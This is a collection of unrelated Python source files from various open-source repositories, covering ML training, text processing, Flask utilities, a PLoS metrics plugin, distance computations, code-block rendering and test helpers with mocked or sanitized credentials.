    # Decrease the learning rate by a factor of 10 every 5 canonical epochs:
cur_lr = opts.base_learning_rate*10.0**(
-global_step/opts.canonical_epoch_size/5.0)
if (global_step + 1) % opts.summary_rate == 0 and opts.logdir is not None:
cur_loss, cur_mfcc_loss, summary_pb = sess.run(
[loss, mfcc_loss, summaries, minimize],
feed_dict={learning_rate: cur_lr,
adams_epsilon: opts.epsilon})[0:3]
summary_writer.add_summary(summary_pb, global_step)
else:
cur_loss, cur_mfcc_loss = sess.run(
[loss, mfcc_loss, minimize],
feed_dict={learning_rate: cur_lr,
adams_epsilon: opts.epsilon})[0:2]
new_time = time.time()
print(("loss[{}]: {:.3f} mfcc {:.3f} dt {:.3f} lr {:.4g}").format(
global_step, cur_loss, cur_mfcc_loss, new_time - last_time, cur_lr))
last_time = new_time
if (global_step + 1) % opts.checkpoint_rate == 0 and \
opts.output_file is not None:
saver.save(sess, opts.output_file, global_step)
sys.stdout.flush()
print("Training done.")
if opts.output_file is not None:
saver.save(sess, opts.output_file)
sess.close()
| 9,967 |
src/common_utils_data/nlp_functions.py
|
Mi524/common_utils_data
| 0 |
2169123
|
import math  # math.ceil is used in get_keyword_dict below
import re
from collections import defaultdict, Counter
from .regex_functions import replace_punctuations , replace_re_special, get_keyword_pat
from .os_functions import enter_exit
import xlrd
def convert_key2list(word_dict):
word_list = []
for k, v in word_dict.items():
for w in v :
word_list.append(w)
return word_list
def get_keyword_dict(path_list):
    # Keywords of each keyword column (the text that needs to be coloured)
keyword_dict = defaultdict(set)
    # Category (sheet/colour name) of each keyword column
keyword_format_dict = defaultdict(str)
if type(path_list) != list:
path_list = [ path_list ]
for path in path_list:
wb = xlrd.open_workbook(path)
        # The sheet name carries the colour
sheet_names = wb.sheet_names()
for sn in sheet_names:
ws = wb.sheet_by_name(sn)
            # Table header; it decides whether keywords are written in red, blue, or bold
header_list = []
try:
for x in ws.row(0):
if type(x.value) == str and x.value.strip() != '':
header = x.value.strip()
elif (type(x.value) == float or type(x.value) == int) :
header = str(x.value).rstrip('0').rstrip('.').strip()
else:
                    # Guard against an empty header cell between two keyword columns
header = None
if header != None:
header_list.append(header)
if not header_list:
enter_exit(f'Error when reading keywords:\n{path}-"{sn}" should have at least one table header(keyword column names).')
except IndexError:
enter_exit(f'Error when reading keywords:\n{path}-"{sn}" should have at least one table header(keyword column names).')
seen_keywords = set()
for row in list(ws.get_rows())[1:]:
for i,format_word in enumerate(header_list):
if format_word != None:
keyword_value = row[i].value
if type(keyword_value) == float and math.ceil(keyword_value) == keyword_value:
keyword = str(keyword_value).rstrip('0').rstrip('.').strip()
                    else:  # strip special characters that could cause ambiguity in the regex
keyword = replace_re_special(str(keyword_value).strip().lower())
if keyword not in seen_keywords and keyword != "" :
keyword_dict[format_word].add(keyword)
seen_keywords.add(keyword)
            # Record which colour (sheet name) each keyword category maps to
for h in header_list:
if h != None :
keyword_format_dict[h] = sn.strip().lower()
wb.release_resources()
return keyword_dict, keyword_format_dict
def get_stopword_list(stopwords_path):
stopword_list = defaultdict(int)
with open(stopwords_path,'r') as file:
stopwords = file.read().splitlines()
for s in stopwords:
if s.strip() != '':
stopword_list[s.strip()] = 1
return stopword_list
def process_text_eng(text, keyword_list=[], stopword_list=[], count_keywords_only = False):
    # English text only.
    # Each keyword must be padded with spaces so that only whole words match.
keyword_list = [ ' ' + k + ' ' for k in keyword_list ]
    # Mask e-mail addresses and long digit runs
text = encript_email_pat(text)
text = encript_number_pat(text)
text = replace_punctuations(text, replace_to_symbol=' ', exclude=['@']).lower().strip()
text_list = text.split()
    # Split on whitespace, drop repeated spaces and re-join; pad both ends with spaces so word-boundary matching works
text = ' ' + ' '.join(text_list) + ' '
    # Add the text's own tokens to the keyword list first, then build the regex pattern used for splitting
if not count_keywords_only and keyword_list:
keyword_list = keyword_list + text_list
    # For English, keywords are padded with spaces to ensure whole-word matches
keyword_pat = get_keyword_pat(keyword_list)
if count_keywords_only:
text_list = re.findall(keyword_pat, text, flags=re.I)
else:
text_list = re.split(keyword_pat,text,flags=re.I)
text_list = [ x.lower() for x in text_list if x.strip() != '' ]
text_list = [ t.strip() for t in text_list ]
if stopword_list:
text_list = remove_stopwords(stopword_list, text_list)
text_list = remove_numbers(text_list)
text_list = remove_one_letter(text_list)
text_list = [x.capitalize() for x in text_list]
return text_list
def get_word_freq_dict(text, keyword_list, stopword_list, count_keywords_only=False, word_num=200):
text_list = process_text_eng(text,keyword_list,stopword_list, count_keywords_only=count_keywords_only )
word_count = dict(Counter(text_list).most_common(word_num))
return word_count
def remove_stopwords(stopword_list, word_list):
    # Convert to a dict first; avoid repeated "in list" membership lookups
stopword_dict = { s :1 for s in stopword_list }
new_word_list = [ ]
for w in word_list:
if stopword_dict.get(w,None) == None:
new_word_list.append(w.lower().strip())
return new_word_list
def remove_numbers(word_list):
word_list = [ x for x in word_list if x.isdigit() == False]
return word_list
def remove_one_letter(word_list):
word_list = [x for x in word_list if len(x) >= 2 ]
return word_list
def encript_email_pat(text):
if type(text) == str and text.strip() != '':
email_like_pat = '([a-z0-9]{5,30})(@[^\u4e00-\u9fa5]+\.[a-z0-9]{2,15})'
while True:
if_match = re.search(email_like_pat, string=text)
if if_match != None:
text = re.sub(email_like_pat,repl='*****\g<2>',string=text)
else:
break
return text
def encript_number_pat(text):
if type(text) == str and text.strip() != '':
result = ""
number_counter = 0
new_text = str(text)
for c in new_text:
if c.isnumeric() == True:
number_counter += 1
if number_counter > 3 :
result += '*'
else:
result += c
else:
number_counter = 0
result += c
        # If the input was purely numeric, strip the trailing '.0' below (note: the branch below is unreachable here, since this block only runs for strings)
if type(text) != str :
return result.rstrip('.0')
else:
return result
else:
return text
| 6,372 |
xmasvideo/utils.py
|
torchbox/christmas-video-2017
| 2 |
2170138
|
from functools import wraps
import re
import shutil
import string
from flask import abort, current_app as app, request
_punct_re = re.compile(r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+')
def slugify(text, delim='-'):
"""Generates ASCII-only slug without digits."""
result = []
for word in _punct_re.split(text.lower()):
word = ''.join([i for i in word if i in string.ascii_lowercase])
if word:
result.append(word)
return str(delim.join(result))
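# Hedged example: slugify("Merry Xmas 2017!") -> "merry-xmas" (digit-only words are dropped entirely)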
def unslugify(text, delim='-'):
return text.replace(delim, ' ').title()
def cache_flush_password_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if not app.config['CACHE_FLUSH_PASSWORD']:
abort(403)
if request.form.get('password') != app.config['CACHE_FLUSH_PASSWORD']:
abort(403)
return f(*args, **kwargs)
return decorated_function
def flush_tmp_app_directories():
try:
shutil.rmtree(app.config['XMAS_OUTPUT_FOLDER'])
except FileNotFoundError:
pass
app.logger.info('Deleted %s and its contents',
app.config['XMAS_OUTPUT_FOLDER'])
try:
shutil.rmtree(app.config['XMAS_IMAGE_TXT_FILES_DIR'])
except FileNotFoundError:
pass
app.logger.info('Deleted %s and its contents',
app.config['XMAS_IMAGE_TXT_FILES_DIR'])
try:
shutil.rmtree(app.config['XMAS_VIDEOS_IMAGES_DIR'])
except FileNotFoundError:
pass
app.logger.info('Deleted %s and its contents',
app.config['XMAS_VIDEOS_IMAGES_DIR'])
def apply_acronyms_to_title(title):
acronyms_original = app.config['ACRONYMS']
acronyms_upper = [acronym.upper() for acronym in acronyms_original]
new_title = []
for title_part in title.split():
try:
index = acronyms_upper.index(title_part.upper())
new_title.append(acronyms_original[index])
except ValueError:
new_title.append(title_part)
return ' '.join(new_title)
| 2,045 |
user.py
|
IsSveshuD/lab_3
| 0 |
2169370
|
nameUser = input("Your name: ")
ageUser = input("Your age: ")
liveUser = input("Where do you live: ")
print("This is {0}. (S)he is {1} years old. (S)he lives in {2}.".format(nameUser, ageUser, liveUser))
| 180 |
plugins/metrics/PLoSsearch/Plugin.py
|
figshare/Total-Impact
| 5 |
2169871
|
#!/usr/bin/env python
import simplejson
import json
import urllib
import urllib2
import BeautifulSoup
from BeautifulSoup import BeautifulStoneSoup
import time
import re
import nose
from nose.tools import assert_equals
import sys
import os
import ConfigParser
# This hack is to add current path when running script from command line
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import BasePlugin
from BasePlugin.BasePlugin import BasePluginClass
from BasePlugin.BasePlugin import TestBasePluginClass
# umask 022: newly created files drop write permission for group and others. Set this here so that .pyc files are created with these permissions
os.umask(022)
# Conforms to API specified here: https://github.com/mhahnel/Total-Impact/wiki/Plugin-requirements
# To do automated tests with nosy
# nosy CrossrefPlugin.py -A \'not skip\'
def skip(f):
f.skip = True
return f
class PluginClass(BasePluginClass):
# each plugin needs to customize this stuff
SOURCE_NAME = "PLoSsearch"
SOURCE_DESCRIPTION = "PLoS full text search."
SOURCE_URL = "http://www.plos.org/"
SOURCE_ICON = "http://a0.twimg.com/profile_images/67542107/Globe_normal.jpg"
SOURCE_METRICS = dict(mentions="the number of mentions in PLoS article full text")
PLOS_SEARCH_API_URL = ''
DEBUG = False
def __init__(self):
config = ConfigParser.ConfigParser()
config.readfp(open('../../../config/creds.ini'))
key = config.get('apis', 'PLoS_key')
self.PLOS_SEARCH_API_URL = 'http://api.plos.org/search?q="%s"&api_key=' + key
def get_page(self, id):
if not id:
return(None)
url = self.PLOS_SEARCH_API_URL % id
if (self.DEBUG):
print url
try:
page = self.get_cache_timeout_response(url)
if (self.DEBUG):
print page
except:
page = None
return(page)
def extract_stats(self, page, id):
if not page:
return(None)
(response_header, content) = page
soup = BeautifulStoneSoup(content)
#print soup.prettify()
try:
hits = soup.result['numfound']
except:
hits = 0
return({"mentions":hits})
def get_metric_values(self, id):
page = self.get_page(id)
if page:
response = self.extract_stats(page, id)
else:
response = {}
return(response)
def artifact_type_recognized(self, id):
if (self.is_pmid(id) or self.is_url(id) or self.is_mendeley_uuid(id)):
response = False
else:
response = True;
return(response)
def is_PDB_ID(self, id):
if re.search("[A-Za-z0-9]{4}", id):
return(True)
else:
return(False)
def is_Genbank_ID(self, id):
# to do
return(False)
def is_GEO_ID(self, id):
        if re.search(r"G[A-Z]{2}\d+", id):  # the original pattern had an unclosed character class and would raise re.error
return(True)
else:
return(False)
def is_ArrayExpress_ID(self, id):
        if re.search(r"E-[A-Za-z0-9\-]{4}", id):  # the original character class appeared to be missing the a-z range
return(True)
else:
return(False)
def build_artifact_response(self, artifact_id):
metrics_response = self.get_metric_values(artifact_id)
show_details_url = "http://www.plosone.org/search/advancedSearch.action?pageSize=10&journalOpt=all&unformattedQuery=everything%3A" + artifact_id
metrics_response.update({"show_details_url":show_details_url})
if (self.is_PDB_ID(artifact_id) or self.is_Genbank_ID(artifact_id) or self.is_GEO_ID(artifact_id) or self.is_ArrayExpress_ID(artifact_id)):
metrics_response.update({"type":"dataset"})
else:
metrics_response.update({"type":"unknown"})
return(metrics_response)
def get_artifacts_metrics(self, query):
response_dict = dict()
error = None
time_started = time.time()
for artifact_id in query:
## What other fields would we want to search for up, I wonder?
(artifact_id, lookup_id) = self.get_relevant_id(artifact_id, query[artifact_id], ["doi", "attacheddata"])
if (artifact_id):
artifact_response = self.build_artifact_response(lookup_id)
if artifact_response:
response_dict[artifact_id] = artifact_response
if (time.time() - time_started > self.MAX_ELAPSED_TIME):
error = "TIMEOUT"
break
return(response_dict, error)
class TestPluginClass(TestBasePluginClass):
def setup(self):
self.plugin = PluginClass()
self.test_parse_input = self.testinput.TEST_INPUT_DOI
## this changes for every plugin
def test_build_artifact_response(self):
response = self.plugin.build_artifact_response('10.1371/journal.pcbi.1000361')
assert_equals(response, {'doi': '10.1371/journal.pcbi.1000361', 'title': 'Adventures in Semantic Publishing: Exemplar Semantic Enhancements of a Research Article', 'url': 'http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1000361', 'journal': 'PLoS Comput Biol', 'authors': '<NAME>, Klyne, Miles', 'year': '2009', 'pmid': '19381256', 'type': 'article'})
## this changes for every plugin
def test_get_artifacts_metrics(self):
response = self.plugin.get_artifacts_metrics(self.test_parse_input)
assert_equals(response, ({u'10.1371/journal.pcbi.1000361': {'doi': u'10.1371/journal.pcbi.1000361', 'title': 'Adventures in Semantic Publishing: Exemplar Semantic Enhancements of a Research Article', 'url': 'http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1000361', 'journal': 'PLoS Comput Biol', 'authors': '<NAME>, <NAME>', 'year': '2009', 'pmid': '19381256', 'type': 'article'}}, 'NA'))
#each plugin should make sure its range of inputs are covered
def test_run_plugin_doi(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_DOI))
assert_equals(len(response), 1077)
def test_run_plugin_pmid(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_PMID))
assert_equals(len(response), 961)
def test_run_plugin_url(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_URL))
assert_equals(len(response), 685)
def test_run_plugin_invalid_id(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_DUD))
assert_equals(len(response), 685)
def test_run_plugin_multiple(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_ALL))
assert_equals(len(response), 1710)
| 6,988 |
pycaret/tests/test_persistence.py
|
IncubatorShokuhou/pycaret
| 5,541 |
2167894
|
import os
import pytest
import boto3
from moto import mock_s3
from pycaret.internal.persistence import deploy_model
@pytest.fixture(scope='function')
def aws_credentials():
"""Mocked AWS Credentials for moto."""
os.environ['AWS_ACCESS_KEY_ID'] = 'testing'
os.environ['AWS_SECRET_ACCESS_KEY'] = 'testing'
os.environ['AWS_SECURITY_TOKEN'] = 'testing'
os.environ['AWS_SESSION_TOKEN'] = 'testing'
@pytest.fixture(scope='function')
def s3(aws_credentials):
"""Create a mock s3 for testing."""
with mock_s3():
yield boto3.client('s3', region_name='us-east-1')
def test_deploy_model(s3):
authentication = {'bucket': 'pycaret-test', 'path': 'test'}
s3.create_bucket(Bucket=authentication.get('bucket'))
model = 'test_model'
model_name = 'test'
deploy_model(model, model_name=model_name, platform='aws', authentication=authentication)
s3.head_object(Bucket=authentication.get("bucket"),
Key=os.path.join(authentication.get("path"), f"{model_name}.pkl"))
| 1,032 |
util/math/pairs.py
|
tchlux/util
| 4 |
2169401
|
import numpy as np
# This function maps a pair of distinct integers in the range [0, count)
# to a single index in the range [0, count*(count - 1) // 2). Together with
# index_to_pair below it covers every unordered pair exactly once.
def pair_to_index(p1, p2):
if (p1 < p2): p1, p2 = p2, p1
return (p1 * (p1 - 1) // 2) + p2
# This function maps an index in the range [0, count*(count - 1) // 2]
# to a tuple of integers in the range [0,count). The mapping will cover
# all pairs if you use all indices between [0, count*(count - 1) // 2].
def index_to_pair(index):
val = int(((1/4 + 2*index)**(1/2) + 1/2))
remainder = index - val*(val - 1)//2
return (val, remainder)
# Compute the number of original elements when given the number of pairs.
# This is done by realizing the following:
#
# n(n-1) / 2 = f(n)
# (n^2 - n) / 2 = f(n)
# n^2 - n = 2 f(n)
# n^2 - n + 1/4 = 2 f(n) + 1/4
# (n - 1/2)^2 = 2 f(n) + 1/4
# n - 1/2 = (2 f(n) + 1/4)^{1/2}
# n = (2 f(n) + 1/4)^{1/2} + 1/2
# 2n = (8 f(n) + 1)^{1/2} + 1
# n = ((8 f(n) + 1)^{1/2} + 1) / 2
#
def num_from_pairs(num_pairs):
return int(round( ((8*num_pairs + 1)**(1/2) + 1) / 2 ))
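# Hedged sanity checks for the helpers above:
#   pair_to_index(7, 3) == 24 and index_to_pair(24) == (7, 3)   (round trip)
#   10 points give 10*9//2 == 45 pairs, and num_from_pairs(45) == 10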
# Define a custom error for passing arrays of the wrong shape to pairwise.
class ShapeError(Exception): pass
# Compute the distance between all pairs of elements in a single list,
# or the distance of all combined pairs between two lists.
def pairwise_distance(x1, x2=None):
# Define an error for having the wrong array shape.
if (len(x1.shape) != 2): raise(ShapeError("Only 2D NumPy arrays are allowed."))
# Determine use case.
if (type(x2) == type(None)):
# Compute the pairwise distances.
x1_sq = np.sum(x1**2, axis=1, keepdims=True)
d = (x1_sq + x1_sq[:,0]) - 2 * np.matmul(x1, x1.T)
        # Protect against the errors that will occur along the diagonal.
d[np.diag_indices(len(d))] = 1.0
d[:,:] = np.sqrt(d[:,:])
d[np.diag_indices(len(d))] = 0.0
return d
else:
if (len(x2.shape) != 2): raise(ShapeError("Only 2D NumPy arrays are allowed."))
        # Compute the pairwise distance between members of each set.
x1_sq = np.sum(x1**2, axis=1, keepdims=True)
x2_sq = np.sum(x2**2, axis=1)
return np.sqrt(x1_sq + x2_sq - 2 * np.matmul(x1, x2.T))
# ============================================================
# Test Cases
# ============================================================
def _test_pairwise_distance(display=False):
x = np.random.random((100,30))
y = np.random.random((10,30))
# Verify that the pairwise distance (between points in two sets) works.
dists = pairwise_distance(x, y)
for i in range(len(x)):
for j in range(len(y)):
truth = np.linalg.norm(x[i] - y[j])
assert(abs(dists[i,j] - truth) < 2**(-32))
# Verify that the pairwise distance (between points in one set) works.
dists = pairwise_distance(x)
for i in range(len(x)):
for j in range(i+1, len(x)):
ij = dists[i,j]
ji = dists[j,i]
truth = np.linalg.norm(x[i] - x[j])
assert(ij == ji)
assert(abs(ij - truth) < 2**(-32))
if display:
from scipy.spatial.distance import pdist, cdist
from util.system import Timer
x = np.random.random((500,4000))
y = np.random.random((5000,4000))
t = Timer()
d = pdist(x)
t.stop()
print("scipy ", d.shape, t.total)
t = Timer()
d = pairwise_distance(x)
t.stop()
print("mine ", d.shape, t.total)
t = Timer()
x2 = np.sum(x**2, axis=1, keepdims=True)
d = np.sqrt((x2 + x2[:,0]) - 2 * np.matmul(x, x.T))
t.stop()
print("numpy ", d.shape, t.total)
print()
t = Timer()
d = cdist(x,y)
t.stop()
print("scipy ", d.shape, t.total)
t = Timer()
d = pairwise_distance(x, y)
t.stop()
print("mine ", d.shape, t.total)
t = Timer()
x2 = np.sum(x**2, axis=1, keepdims=True)
y2 = np.sum(y**2, axis=1)
p = 2 * np.matmul(x, y.T)
d = np.sqrt(x2 + y2 - p)
t.stop()
print("numpy ", d.shape, t.total)
if __name__ == "__main__":
_test_pairwise_distance()
| 4,436 |
plugins.py
|
yobin/saepy-log
| 3 |
2167190
|
# -*- coding: utf-8 -*-
import re
from pygments import highlight
from pygments import lexers
from pygments import formatters
###### def
def pygmentize(code_raw, language):
lexer = lexers.get_lexer_by_name(language, encoding='utf-8', startinline=True)
return highlight(code_raw, lexer, formatters.HtmlFormatter(encoding="utf-8",startinline=True))
def tableize_code (text, lang = ""):
string = text.strip()
table = ['<div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers">']
code = []
index = 0
for line in string.split("\n"):
table.append("<span class='line-number'>%d</span>\n" % (index+1))
code.append("<span class='line'>%s</span>" % line)
index += 1
table.append("</pre></td><td class='code'><pre><code class='%s'>%s</code></pre></td></tr></table></div>" % (lang, "\n".join(code)))
return "".join(table)
def strip_hl_div(text):
__HL_RE = re.compile('<div class="highlight"><pre>(.+?)</pre></div>', re.UNICODE|re.I|re.M|re.S)
m = __HL_RE.match(text)
if m:
return text.replace(m.group(0), m.group(1))
return text
####### code block #####
def code_block(text):
"""
Syntax
{% codeblock [title] [lang:language] [url] [link text] %}
code snippet
{% endcodeblock %}
"""
__CODE_BLOCK_RE = re.compile(r"""\s({% codeblock ([^%\[\]]*)%}(.+?){% endcodeblock %})""",re.I|re.M|re.S)
__CaptionUrlTitle = re.compile('(\S[\S\s]*)\s+(https?:\/\/\S+|\/\S+)\s*(.+)?', re.UNICODE|re.I|re.M|re.S)
__Caption = re.compile('(\S[\S\s]*)', re.UNICODE|re.I|re.M|re.S)
__Lang = re.compile('\s*lang:(\S+)', re.UNICODE|re.I|re.M|re.S)
codes = __CODE_BLOCK_RE.findall(text)
for code in codes:
caption = ""
filetype = ""
fileurl = ""
code_block_str = code[0]
code_info = code[1]
code_raw = code[2]
if code_info:
m = __Lang.search(code_info)
if m:
filetype = m.group(1)
code_info = __Lang.sub("", code_info)
m = __CaptionUrlTitle.match(code_info)
if m:
filename = m.group(1)
caption = "<figcaption><span>%s</span><a href='%s' target='_blank' rel='nofollow'>%s</a></figcaption>\n" % (m.group(1), m.group(2), m.group(3))
else:
m2 = __Caption.match(code_info)
if m2:
filename = m2.group(1)
caption = "<figcaption><span>%s</span></figcaption>\n" % m2.group(1)
else:
filename = ""
caption = ""
if not filetype and filename:
m = re.search(r"\S[\S\s]*\w+\.(\w+)", filename)
if m:
filetype = m.group(1)
#
source = ["<figure class='code'>"]
if caption:
source.append(caption)
if filetype:
try:
hltext = pygmentize(code_raw, filetype)
tmp_text = tableize_code (strip_hl_div(hltext), filetype)
except:
tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))
else:
tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))
source.append(tmp_text)
source.append("</figure>")
#print "\n".join(source)
text = text.replace(code_block_str, "\n".join(source))
return text
### Backtick Code Blocks ###
def backtick_code_block(text):
"""
Syntax
``` [language] [title] [url] [link text]
code snippet
```
"""
__CODE_BLOCK_RE = re.compile(r"""\s(^`{3} *([^\n]+)?\n(.+?)\n`{3})""",re.I|re.M|re.S)
__AllOptions = re.compile('([^\s]+)\s+(.+?)\s+(https?:\/\/\S+|\/\S+)\s*(.+)?', re.UNICODE|re.I|re.M|re.S)
__LangCaption = re.compile('([^\s]+)\s*(.+)?', re.UNICODE|re.I|re.M|re.S)
codes = __CODE_BLOCK_RE.findall(text)
for code in codes:
options = ""
caption = ""
lang = ""
fileurl = ""
code_block_str = code[0]
code_info = code[1]
code_raw = code[2]
if code_info:
m = __AllOptions.match(code_info)
if m:
lang = m.group(1)
caption = "<figcaption><span>%s</span><a href='%s' target='_blank' rel='nofollow'>%s</a></figcaption>" % (m.group(2), m.group(3), m.group(4))
else:
m2 = __LangCaption.match(code_info)
if m2:
lang = m2.group(1)
caption = "<figcaption><span>%s</span></figcaption>" % m2.group(2)
if re.match('\A( {4}|\t)', code_raw):
code_raw = re.sub('^( {4}|\t)', '', code_raw)
#
source = ["<figure class='code'>"]
if caption:
source.append(caption)
if not lang or lang == 'plain':
tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))
else:
try:
hltext = pygmentize(code_raw, lang)
tmp_text = tableize_code (strip_hl_div(hltext), lang)
except:
tmp_text = tableize_code(code_raw.replace('<', '&lt;').replace('>', '&gt;'))
source.append(tmp_text)
source.append("</figure>")
text = text.replace(code_block_str, "\n".join(source))
return text
### VideoTag ###
def videotag(text):
"""
Syntax
{% video url/to/video [width height] [url/to/poster] %}
"""
__VIDEOTAG_RE = re.compile(r"""\s({% video (https?:\S+)(\s+(https?:\S+))?(\s+(https?:\S+))?(\s+(\d+)\s(\d+))?(\s+(https?:\S+))? %})""",re.I|re.M|re.S)
codes = __VIDEOTAG_RE.findall(text)
vtype = {
'mp4': "type='video/mp4; codecs=\"avc1.42E01E, mp4a.40.2\"'",
'ogv': "type='video/ogg; codecs=theora, vorbis'",
'webm': "type='video/webm; codecs=vp8, vorbis'"
}
for code in codes:
video = code[1]
width = int(code[7])
height = int(code[8])
poster = code[10]
if video and width > 0 and height > 0:
video_code = []
video_code.append("<video width='%d' height='%d' preload='none' controls poster='%s'>" % (width, height, poster))
t = video.split(".")[-1]
video_code.append("<source src='%s' %s>" % (video, vtype[t]))
video_code.append("</video>")
text = text.replace(code[0], "".join(video_code))
return text
###########
def parse_text(text):
#text = code_block(text)
text = videotag(text)
text = backtick_code_block(text)
return text
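# --- Hypothetical usage sketch (not part of the original module) ---
# Assumes pygmentize (defined earlier in this file) has a working Pygments
# install behind it; otherwise the except branches above fall back to plain
# HTML-escaped output. The sample snippet and filename are made up.
if __name__ == "__main__":
    sample = "\n``` python hello.py\nprint('hi')\n```\n"
    print(parse_text(sample))  # emits a <figure class='code'> block with line numbers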
| 6,619 |
py/projects/functional_web_tests/tests/pages/ynet_home.py
|
qaviton/test_repository
| 7 |
2170103
|
from tests.pages.components.page import Page
from tests.parameters.locators import locator
class YnetHomePage(Page):
def c3_Hor(self):
return self.find_all(locator.c3_Hor)
def evritiframe_1(self):
return self.find_all(locator.evritiframe_1)
def multiarticles_15(self):
return self.find_all(locator.multiarticles_15)
def multiarticles_5(self):
return self.find_all(locator.multiarticles_5)
def close_console(self):
return self.find_all(locator.close_console)
def su_iframe(self):
return self.find_all(locator.su_iframe)
def xButtn(self):
return self.find_all(locator.xButtn)
def console_resize(self):
return self.find_all(locator.console_resize)
def first_title(self):
return self.find_all(locator.first_title)
def arrows(self):
return self.find_all(locator.arrows)
def mainSearchSelectText(self):
return self.find_all(locator.mainSearchSelectText)
def teaserxnet_1(self):
return self.find_all(locator.teaserxnet_1)
def iframe_container(self):
return self.find_all(locator.iframe_container)
def null(self):
return self.find_all(locator.null)
def ads_300x250_4(self):
return self.find_all(locator.ads_300x250_4)
| 1,310 |
sdk/communication/azure-communication-identity/tests/_shared/testcase.py
|
nittaya1990/azure-sdk-for-python
| 2 |
2169619
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import re
import os
from devtools_testutils import AzureTestCase
from azure_devtools.scenario_tests import RecordingProcessor, ReplayableTest
from azure_devtools.scenario_tests.utilities import is_text_payload
from azure.communication.identity._shared.utils import parse_connection_str
from _shared.utils import generate_teams_user_aad_token
class ResponseReplacerProcessor(RecordingProcessor):
def __init__(self, keys=None, replacement="sanitized"):
self._keys = keys if keys else []
self._replacement = replacement
def process_response(self, response):
def sanitize_dict(dictionary):
for key in dictionary:
value = dictionary[key]
if isinstance(value, str):
dictionary[key] = re.sub(
r"("+'|'.join(self._keys)+r")",
self._replacement,
dictionary[key])
elif isinstance(value, dict):
sanitize_dict(value)
sanitize_dict(response)
return response
class BodyReplacerProcessor(RecordingProcessor):
"""Sanitize the sensitive info inside request or response bodies"""
def __init__(self, keys=None, replacement="sanitized"):
self._replacement = replacement
self._keys = keys if keys else []
def process_request(self, request):
if is_text_payload(request) and request.body:
request.body = self._replace_keys(request.body.decode()).encode()
return request
def process_response(self, response):
if is_text_payload(response) and response['body']['string']:
response['body']['string'] = self._replace_keys(response['body']['string'])
return response
def _replace_keys(self, body):
def _replace_recursively(dictionary):
for key in dictionary:
value = dictionary[key]
if key in self._keys:
dictionary[key] = self._replacement
elif isinstance(value, dict):
_replace_recursively(value)
import json
try:
body = json.loads(body)
_replace_recursively(body)
except (KeyError, ValueError):
return body
return json.dumps(body)
class CommunicationTestCase(AzureTestCase):
FILTER_HEADERS = ReplayableTest.FILTER_HEADERS + ['x-azure-ref', 'x-ms-content-sha256', 'location']
def __init__(self, method_name, *args, **kwargs):
super(CommunicationTestCase, self).__init__(method_name, *args, **kwargs)
def setUp(self):
super(CommunicationTestCase, self).setUp()
if self.is_playback():
self.connection_str = "endpoint=https://sanitized/;accesskey=fake==="
self.m365_app_id = "sanitized"
self.m365_aad_authority = "sanitized"
self.m365_aad_tenant = "sanitized"
self.m365_scope = "sanitized"
self.msal_username = "sanitized"
self.msal_password = "<PASSWORD>"
self.expired_teams_token = "<PASSWORD>"
self.skip_get_token_for_teams_user_tests = "false"
else:
self.connection_str = os.getenv('COMMUNICATION_LIVETEST_DYNAMIC_CONNECTION_STRING')
self.m365_app_id = os.getenv('COMMUNICATION_M365_APP_ID')
self.m365_aad_authority = os.getenv('COMMUNICATION_M365_AAD_AUTHORITY')
self.m365_aad_tenant = os.getenv('COMMUNICATION_M365_AAD_TENANT')
self.m365_scope = os.getenv('COMMUNICATION_M365_SCOPE')
self.msal_username = os.getenv('COMMUNICATION_MSAL_USERNAME')
self.msal_password = os.getenv('COMMUNICATION_MSAL_PASSWORD')
self.expired_teams_token = os.getenv('COMMUNICATION_EXPIRED_TEAMS_TOKEN')
endpoint, _ = parse_connection_str(self.connection_str)
self._resource_name = endpoint.split(".")[0]
self.scrubber.register_name_pair(self._resource_name, "sanitized")
self.skip_get_token_for_teams_user_tests = os.getenv('SKIP_INT_IDENTITY_EXCHANGE_TOKEN_TEST')
def generate_teams_user_aad_token(self):
if self.is_playback():
teams_user_aad_token = "sanit<PASSWORD>"
else:
teams_user_aad_token = generate_teams_user_aad_token(m365_app_id=self.m365_app_id, m365_aad_authority=self.m365_aad_authority, m365_aad_tenant=self.m365_aad_tenant, msal_username=self.msal_username, msal_password=<PASSWORD>, m365_scope=self.m365_scope)
return teams_user_aad_token
def skip_get_token_for_teams_user_test(self):
return str(self.skip_get_token_for_teams_user_tests).lower() == 'true'
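# --- Hypothetical usage sketch (not part of the original test helpers) ---
# Shows how BodyReplacerProcessor scrubs configured keys out of a recorded
# JSON body; the key name "token" and the payload are made up.
if __name__ == "__main__":
    processor = BodyReplacerProcessor(keys=["token"])
    print(processor._replace_keys('{"id": "user1", "token": "secret"}'))
    # -> {"id": "user1", "token": "sanitized"}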
| 5,018 |
stack/stack.py
|
pcordemans/algorithms_examples
| 0 |
2170169
|
from sllist import SingleLinkedList
class Stack:
def __init__(self):
self.__list = SingleLinkedList()
def top(self):
return self.__list.head()
def push(self, element):
self.__list.prepend(element)
def pop(self):
element = self.top()
self.__list = self.__list.tail()
return element
def isEmpty(self):
return self.__list.isEmpty()
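# --- Hypothetical usage sketch (not part of the original module) ---
# Assumes sllist.SingleLinkedList provides prepend/head/tail/isEmpty as used above.
if __name__ == "__main__":
    s = Stack()
    s.push(1)
    s.push(2)
    assert s.pop() == 2  # last in, first out
    assert s.pop() == 1
    assert s.isEmpty()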
| 409 |
stress/test_bigindex.py
|
soad241/whoosh
| 2 |
2169072
|
import unittest
import os.path, random
from shutil import rmtree
from whoosh import fields, index
from whoosh.filedb.filestore import FileStorage
class Test(unittest.TestCase):
